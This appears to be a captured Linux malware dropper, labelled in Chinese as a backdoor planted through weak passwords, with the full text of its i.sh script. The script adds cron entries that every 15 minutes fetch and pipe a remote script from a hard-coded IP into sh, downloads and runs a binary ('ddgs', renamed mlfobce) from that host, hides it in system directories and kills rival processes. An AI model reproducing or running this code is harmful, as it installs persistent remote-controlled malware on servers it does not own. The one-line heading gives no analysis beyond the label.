利用系统若口令,插入任务计划,生成后门
wget -q http://119.9.106.27:8000/static/3022/ddgs.$(uname -m) -O mlfobce
http://119.9.106.27:8000/i.sh
-----------------------------------------------------------i.sh-----------------------------------------------------------------
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/15 * * * * (curl -fsSL http://119.9.106.27:8000/i.sh||wget -q -O- http://119.9.106.27:8000/i.sh) | sh" | crontab -
echo "" > /var/spool/cron/root
echo "*/15 * * * * wget -q -O- http://119.9.106.27:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -O- http://119.9.106.27:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep mlfobce || rm -rf mlfobce
if [ ! -f "mlfobce" ]; then
wget -q http://119.9.106.27:8000/static/3022/ddgs.$(uname -m) -O mlfobce
fi
chmod +x mlfobce
$(pwd)/mlfobce || /usr/bin/mlfobce || /usr/libexec/mlfobce || /usr/local/bin/mlfobce || mlfobce || ./mlfobce || /tmp/mlfobce
ps auxf | grep -v grep | grep mlfobcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep mlfobcd | awk '{print $2}' | xargs kill -9
--------------------------------------------------------------------------------------------